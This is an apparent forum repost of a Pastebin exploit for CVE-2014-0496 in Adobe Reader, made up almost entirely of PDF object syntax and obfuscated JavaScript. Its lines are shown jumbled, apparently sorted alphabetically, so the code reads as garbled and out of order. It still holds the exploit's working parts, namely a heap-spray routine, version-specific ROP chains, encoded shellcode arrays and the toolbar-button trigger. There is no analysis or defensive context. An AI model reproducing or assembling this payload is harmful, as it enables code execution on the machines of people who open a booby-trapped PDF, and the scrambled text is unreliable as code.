Nytro

CVE-2014-0496 Adobe Pdf Exploit ToolButton


CVE-2014-0496 Adobe Pdf Exploit ToolButton

    

@PhysicalDrive0

});
1 0 obj
2 0 obj
3 0 obj
4 0 obj
5 0 obj
6 0 obj
7 0 obj
aaa += aaa;
aa=dd13.split("%u");
aa[i]=str12+aa[i];
/AcroForm 6 0 R
addButtonFunc = function () {
af1="aaaaa%aaaaaaaauaaaaaa";
af1=af1[("112","a2s1","replace")](/a/g,'');
app.addToolButton({
app.addToolButton({
app.alert('123');
app.removeToolButton({
as1211();
bbb += aaa;
bbb = bbb.substring(0, i11 / 2);
bbb += sa;
bbb += str;
break;
ccc += ccc;
cEnable: "addButtonFunc();"
cEnable: "removeButtonFunc();"
cExec: "1",
cExec: "1",
cName: "evil"
cName: "evil",
cName: "xxx",
</config>
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
/Count 1
dd13=aa.join('%u');
dd13=af1+dd13;
dd13=xx13.join('%u');
} else {
} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
endobj
endstream
for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141");
for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
for (i = 0; i < aa[tt1]; i++)
for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141");
function as1211()
function heapSpray(str, str_addr, r_addr) {
function opp12(xx13)
heapSpray(payload, ret_addr, r_addr);
if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {
if(ccc[tt] >= (0x40000*2))
if(j)
if (!r11) {
if (vulnerable) {
j=4-aa[i][tt1];
/Kids [3 0 R]
<</Length 10074>>
<</Length 372>>
obj_size = 0x330 + 0x1c;
obj_size = 0x360 + 0x1c;
obj_size = 0x370;
/OpenAction 4 0 R
/Pages 2 0 R
<pageSet></pageSet>
/Parent 2 0 R
part1 += rop_addr;
%%%%%PDF-6.5
PE/%%%%%%
<present><pdf><interactive>1</interactive></pdf></present>
r11 = true;
r_addr = 0x08a8;
r_addr = 0x08e4;
r_addr = 0x08e8;
removeButtonFunc = function () {
ret_addr = this[un12]("%u8003%u4a84");
ret_addr = this[un12]("%ua83e%u4a82");
ret_addr = this[un12]("%ua8df%u4a82");
return;
return dd13;
rop_addr = this[un12]("%u08a8%u0c0c");
rop_addr = this[un12]("%u08e4%u0c0c");
rop_addr = this[un12]("%u08e8%u0c0c");
rop = rop10;
rop = rop11;
rop = rop9;
<</Size 8/Root 1 0 R>>
str12=new Array(j+1).join("0");
stream
<subform name="form1" layout="tb" locale="en_US">
</subform></template></xdp:xdp>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
trailer
tt1=tt1[("112","a2s1","replace")](/a/g,'');
tt=tt[("112","a2s1","replace")](/a/g,'');
/tYPE/aCTION/S/JavaScript/JS 5 0 R>>
/type /Page
/Type /Page
/Type /Pages
un12='';
un12=un12[("112","as1","replace")](/w/g,'');
un12="uwnwwewwwswcwwwawwpwe";
var aaa = this[un12]("%u0c0c");
var arr = new Array();
var bbb = aaa.substring(0, i1 / 2);
var ccc = bbb.substring(0, i2 / 2);
var ddd = ccc.substring(0, 0x80000 - i3);
var eee = new Array();
var executable = "";
var i11 = 0x0c0c - 0x24;
var i1 = r_addr - 0x24;
var i2 = 0x4000 + 0xc000;
var i3 = (0x1020 - 0x08) / 2;
var obj_size;
var part1 = "";
var part2 = "";
var part2_len = obj_size - part1[tt1] * 2;
var payload = rop + shellcode;
var r11 = false;
var r_addr;
var ret_addr;
var rop;
var rop10 = this[("123","1a1",un12)](opp12(xx132));
var rop11 = this[("123","1a1",un12)](opp12(xx131));
var rop9 = this[("123","1a1",un12)](opp12(xx133));
var rop_addr;
var sa = str_addr;
var shellcode = this[("123","1a1",un12)](opp12(xx134));
var tt1="alaaeaanaaagataaah";
var tt="alaaeaanaagataah";
var vulnerable = true;
var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16));
var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16));
var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16));
var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),
0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16));
vulnerable = false;
while (1)
while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa;
while (sa[tt] < (xxx - r_addr)) sa += sa;
x11=9;
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<</XFA 7 0 R>>
<?xml version="1.0" encoding="UTF-8"?>
xxx=0x0c0c;

Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com
